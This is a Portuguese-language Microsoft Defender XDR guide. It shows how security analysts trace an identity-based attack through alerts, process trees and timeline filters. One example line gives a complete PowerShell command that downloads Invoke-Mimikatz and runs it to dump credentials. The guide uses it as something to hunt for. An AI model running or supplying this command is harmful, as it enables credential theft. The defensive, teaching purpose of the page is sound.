Partilhar via


Exemplo de um ataque baseado na identidade

Aplica-se a:

  • Microsoft Defender XDR

Microsoft Defender para Identidade pode ajudar a detetar tentativas maliciosas para comprometer identidades na sua organização. Uma vez que o Defender para Identidade se integra com Microsoft Defender XDR, os analistas de segurança podem ter visibilidade sobre ameaças provenientes do Defender para Identidade, como tentativas suspeitas de elevação de privilégios do Netlogon.

Analisar o ataque no Microsoft Defender para Identidade

Microsoft Defender XDR permite que os analistas filtrem alertas por origem de deteção no separador Alertas da página incidentes. No exemplo seguinte, a origem de deteção é filtrada para Defender para Identidade.

Filtrar a origem de deteção no Microsoft Defender para Identidade

A seleção do alerta Deteção de ataques via viaduto do hash é apresentada numa página no Microsoft Defender for Cloud Apps que apresenta informações mais detalhadas. Pode sempre saber mais sobre um alerta ou ataque ao selecionar Saiba mais sobre este tipo de alerta para ler uma descrição das sugestões de ataque e remediação.

Um alerta de ataque de passagem superior do hash suspeito

Investigar o mesmo ataque no Microsoft Defender para Endpoint

Em alternativa, um analista pode utilizar o Defender para Endpoint para saber mais sobre a atividade num ponto final. Selecione o incidente na fila de incidentes e, em seguida, selecione o separador Alertas . A partir daqui, também podem identificar a origem da deteção. Uma origem de deteção identificada como EDR significa Deteção e Resposta de Ponto Final, que é o Defender para Ponto Final. A partir daqui, o analista seleciona um alerta detetado pelo EDR.

Uma Deteção e Resposta de Ponto Final no portal do Microsoft Defender para Endpoint

A página de alerta apresenta várias informações pertinentes, tais como o nome do dispositivo afetado, o nome de utilizador, o estado da investigação automática e os detalhes do alerta. A história do alerta ilustra uma representação visual da árvore de processos. A árvore de processos é uma representação hierárquica de processos principais e subordinados relacionados com o alerta.

Uma árvore de processos de alerta no Microsoft Defender para Endpoint

Cada processo pode ser expandido para ver mais detalhes. Os detalhes que um analista pode ver são os comandos reais que foram introduzidos como parte de um script malicioso, endereços IP de ligação de saída e outras informações úteis.

Os detalhes do processo no portal do Microsoft Defender para Endpoint

Ao selecionar Ver na linha cronológica, um analista pode desagregar ainda mais para determinar a hora exata do compromisso.

Microsoft Defender para Endpoint pode detetar muitos ficheiros e scripts maliciosos. No entanto, devido a muitas utilizações legítimas para ligações de saída, o PowerShell e a atividade da linha de comandos, alguma atividade seria considerada benigna até criar um ficheiro ou atividade maliciosa. Por conseguinte, a utilização da linha cronológica ajuda os analistas a colocar o alerta em contexto com a atividade circundante para determinar a origem ou hora original do ataque que, de outra forma, é ocultada pelo sistema de ficheiros comum e pela atividade do utilizador.

Para utilizar a linha cronológica, um analista começaria no momento da deteção de alertas (a vermelho) e deslocar-se-ia para trás no tempo para determinar quando a atividade original que levou à atividade maliciosa realmente começou.

Hora de início do analista para a deteção de alertas

É importante compreender e distinguir atividades comuns, como Windows Update ligações, tráfego de ativação de Software Fidedigno do Windows, outras ligações comuns a sites da Microsoft, atividade de Internet de terceiros, atividade de Configuration Manager do Microsoft Endpoint e outras atividades benignas de atividades suspeitas. Uma forma de distinguir é através da utilização de filtros de linha cronológica. Existem muitos filtros que podem realçar atividades específicas ao filtrar tudo o que o analista não quer ver.

Na imagem abaixo, o analista filtrou para ver apenas eventos de rede e de processo. Este critério de filtro permite ao analista ver as ligações de rede e os processos em torno do evento em que o Bloco de Notas estabeleceu uma ligação com um endereço IP, que também vimos na árvore de processos.

Como o Bloco de Notas foi utilizado para fazer uma ligação de saída maliciosa

Neste evento específico, o Bloco de Notas foi utilizado para fazer uma ligação de saída maliciosa. No entanto, muitas vezes, os atacantes utilizam iexplorer.exe para estabelecer ligações para transferir um payload malicioso, uma vez que normalmente iexplorer.exe processos são considerados atividade regular do browser.

Outro item a procurar na linha cronológica seria o PowerShell utilizar para ligações de saída. O analista procuraria ligações bem-sucedidas do PowerShell com comandos como IEX (New-Object Net.Webclient) , por exemplo, uma ligação de saída a um site que alojasse um ficheiro malicioso.

No exemplo seguinte, o PowerShell foi utilizado para transferir e executar o Mimikatz a partir de um site:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Um analista pode procurar rapidamente palavras-chave ao escrever a palavra-chave na barra de pesquisa para apresentar apenas os eventos criados com o PowerShell.

Passo seguinte

Veja o caminho de investigação de phishing .

Consulte também

Sugestão

Quer saber mais? Interaja com a comunidade do Microsoft Security na nossa Tech Community: Microsoft Defender XDR Tech Community.